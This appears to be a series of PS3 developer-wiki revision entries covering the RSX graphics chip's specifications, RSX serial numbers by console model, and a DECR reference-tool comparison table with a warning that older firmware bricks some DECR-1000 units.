the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing (or a legitimate developer) to install an unsupported firmware as the vsh allows updating to 1.00 or higher and the min praxis for those units is actually lower than 1.00.<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issue an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it into the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Reference_Tool_models&diff=41334 Template:Reference Tool models 2016-03-20T18:12:50Z <p>Mathieulh: fixed typo</p> <hr /> <div>{{ed right|Reference Tool models}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Flash_(Hardware)|Flash]] !! [[South_Bridge|SB]] !! [[Syscon_Hardware|Syscon]] !! [[Communication Processor|CP]] !! [[Harddrive|BDemu HDD]] !! [[Harddrive|GameOS HDD]] !! [[Bluray_Drive|Bluray Drive]] !! [[HDMI | HDMI Ports]] !! [[Flash:OtherOS|OtherOS]] !! [[CELL BE]] !! [[RSX]] !! [[USB|USB&lt;br/&gt;Ports]] !! [[GbLAN | GbLan&lt;br/&gt;Ports]] !! [[MultiCardReader|Flash&lt;br/&gt;Readers]] !! Support:&lt;br /&gt;[[Emulation#pspemu|PSP]]&lt;br /&gt;[[PS2_Compatibility|PS2]]&lt;br /&gt;[[Emulation#ps1emu|PS1]] !! SA-&lt;BR /&gt;CD !! WiFi&lt;br/&gt;802.11&lt;BR /&gt;b/g !! [[SKU_Models#Datecode_/_Manufacturing_Date|SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! [[System_Software|SDK/FW &lt;br/&gt;support]] !! [[Template:Metbootldr|downgradeable&lt;br/&gt;Min.&lt;br/&gt;praxis]] !! Other<br /> |-<br /> | [[DECR-1000|DECR-1000(A/J)]] || 0x01 || [[TMU-520]] || [[K9F2G08U0M | 2x 256MB NAND]] || [[CXD2973AGB-4]] || [[CXR713F120A]] || [[TCP-520]] || 400GB || 400GB || ?0x00? || 2 ({{NO}} CEC) || {{PARTIAL}} || {{90nm}} || {{90nm}} || 4 + 2 extra || 4 (1 for dbg.) || {{YES}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} &lt;!-- external antenna --&gt; || 2006 || =&gt;[[1.00 DECR|1.0.0]]&lt;br/&gt;or &lt;br/&gt;=&gt;[[2.30 DECR|2.3.0]] (since 1/2009) || &lt;[[0.85.009]] || contains prototype components, hardware is much closer to [[DEH-R1040]] than [[CECHAxx]].<br /> |-<br /> | [[DECR-1400|DECR-1400A/J]] || 0x09 || [[DEB-001]] || [[&lt;!--?--&gt;S29GL128N90TFIR2|1x 16MB NOR]] || ?[[CXD2984GB]]? || [[CXR713120-201GB]] || (via SB) || - || 160 GB || ?0x0A? || 1 ({{NO}} CEC) || {{PARTIAL}} || {{45nm}} || {{65nm}} || 4 || 2 (1 for dbg.) || {{NO}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} || 6/2009 || =&gt;[[2.60 DECR|2.6.0]] || =&gt;?[[2.60 DECR|2.60]]? || same case as retail PS3<br /> |-<br /> |}<br /> <br /> Differences between the [[DECR-1000|1000]] and [[DECR-1400|1400]]:<br /> *[[DECR-1000]]:<br /> ** Gb-DEVLAN is connected to the [[Communication Processor]]<br /> ** With a pre [[0.85.009]] bootrom you do have two [[HDMI]] outputs.<br /> &lt;!-- ** Could be turned into a {{SD}} System Debugger by changing the [[South Bridge]] firmware, adding a special CP Sister Board and using a specific {{SD}} firmware --&gt;<br /> ** '''Not all DECR-1000 are equal! Despite Sony's documentation claiming otherwise, DECR-1000 units with RSX rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;'''.<br /> <br /> * [[DECR-1400]]: <br /> ** You cannot use Performance monitoring functions (libperf, libprof, tuner for PS3)<br /> *** for SPU: PC sampling, Performance counters, Bookmark, RAW SPU support<br /> *** for [[RSX]]: Signal Trace, User Events.<br /> ** DECI3 is limited to one protocol and a data exchange size of 65535 bytes.<br /> ** The two [[GbLAN]]´s share the same MAC ID and cannot be used in the same network segment.<br /> ** Gb-DEVLAN is connected to [[South Bridge]].<br /> &lt;br/&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Template:Reference_Tool_models&diff=41314 Template:Reference Tool models 2016-03-18T18:50:13Z <p>Mathieulh: Added a warning about downgrading DECR-1000 units below their RSX rom support</p> <hr /> <div>{{ed right|Reference Tool models}}<br /> <br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! Model !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Flash_(Hardware)|Flash]] !! [[South_Bridge|SB]] !! [[Syscon_Hardware|Syscon]] !! [[Communication Processor|CP]] !! [[Harddrive|BDemu HDD]] !! [[Harddrive|GameOS HDD]] !! [[Bluray_Drive|Bluray Drive]] !! [[HDMI | HDMI Ports]] !! [[Flash:OtherOS|OtherOS]] !! [[CELL BE]] !! [[RSX]] !! [[USB|USB&lt;br/&gt;Ports]] !! [[GbLAN | GbLan&lt;br/&gt;Ports]] !! [[MultiCardReader|Flash&lt;br/&gt;Readers]] !! Support:&lt;br /&gt;[[Emulation#pspemu|PSP]]&lt;br /&gt;[[PS2_Compatibility|PS2]]&lt;br /&gt;[[Emulation#ps1emu|PS1]] !! SA-&lt;BR /&gt;CD !! WiFi&lt;br/&gt;802.11&lt;BR /&gt;b/g !! [[SKU_Models#Datecode_/_Manufacturing_Date|SKU&lt;br/&gt;Release&lt;br/&gt;date]] !! [[System_Software|SDK/FW &lt;br/&gt;support]] !! [[Template:Metbootldr|downgradeable&lt;br/&gt;Min.&lt;br/&gt;praxis]] !! Other<br /> |-<br /> | [[DECR-1000|DECR-1000(A/J)]] || 0x01 || [[TMU-520]] || [[K9F2G08U0M | 2x 256MB NAND]] || [[CXD2973AGB-4]] || [[CXR713F120A]] || [[TCP-520]] || 400GB || 400GB || ?0x00? || 2 ({{NO}} CEC) || {{PARTIAL}} || {{90nm}} || {{90nm}} || 4 + 2 extra || 4 (1 for dbg.) || {{YES}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} &lt;!-- external antenna --&gt; || 2006 || =&gt;[[1.00 DECR|1.0.0]]&lt;br/&gt;or &lt;br/&gt;=&gt;[[2.30 DECR|2.3.0]] (since 1/2009) || &lt;[[0.85.009]] || contains prototype components, hardware is much closer to [[DEH-R1040]] than [[CECHAxx]].<br /> |-<br /> | [[DECR-1400|DECR-1400A/J]] || 0x09 || [[DEB-001]] || [[&lt;!--?--&gt;S29GL128N90TFIR2|1x 16MB NOR]] || ?[[CXD2984GB]]? || [[CXR713120-201GB]] || (via SB) || - || 160 GB || ?0x0A? || 1 ({{NO}} CEC) || {{PARTIAL}} || {{45nm}} || {{65nm}} || 4 || 2 (1 for dbg.) || {{NO}} || ?{{YES}}?&lt;br/&gt;{{NO}}&lt;br/&gt;{{NO}} || {{NO}} || {{YES}} || 6/2009 || =&gt;[[2.60 DECR|2.6.0]] || =&gt;?[[2.60 DECR|2.60]]? || same case as retail PS3<br /> |-<br /> |}<br /> <br /> Differences between the [[DECR-1000|1000]] and [[DECR-1400|1400]]:<br /> *[[DECR-1000]]:<br /> ** Gb-DEVLAN is connected to the [[Communication Processor]]<br /> ** With a pre [[0.85.009]] bootrom you do have two [[HDMI]] outputs.<br /> &lt;!-- ** Could be turned into a {{SD}} System Debugger by changing the [[South Bridge]] firmware, adding a special CP Sister Board and using a specific {{SD}} firmware --&gt;<br /> ** '''Not all DECR-1000 are equal! Despite Sony's documentation claiming otherwise, DECR-1000 units with RSX rom version b07 and above (and perhaps some others that have not been encounter) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; messaage, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;'''.<br /> <br /> * [[DECR-1400]]: <br /> ** You cannot use Performance monitoring functions (libperf, libprof, tuner for PS3)<br /> *** for SPU: PC sampling, Performance counters, Bookmark, RAW SPU support<br /> *** for [[RSX]]: Signal Trace, User Events.<br /> ** DECI3 is limited to one protocol and a data exchange size of 65535 bytes.<br /> ** The two [[GbLAN]]´s share the same MAC ID and cannot be used in the same network segment.<br /> ** Gb-DEVLAN is connected to [[South Bridge]].<br /> &lt;br/&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=41313 RSX 2016-03-18T18:44:40Z <p>Mathieulh: /* ROM Versions */ Added one more RSX revision</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|&lt;br /&gt;Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|&lt;br /&gt;RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|&lt;br /&gt;BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = Hardware =<br /> RSX - Reality Synthesizer<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> 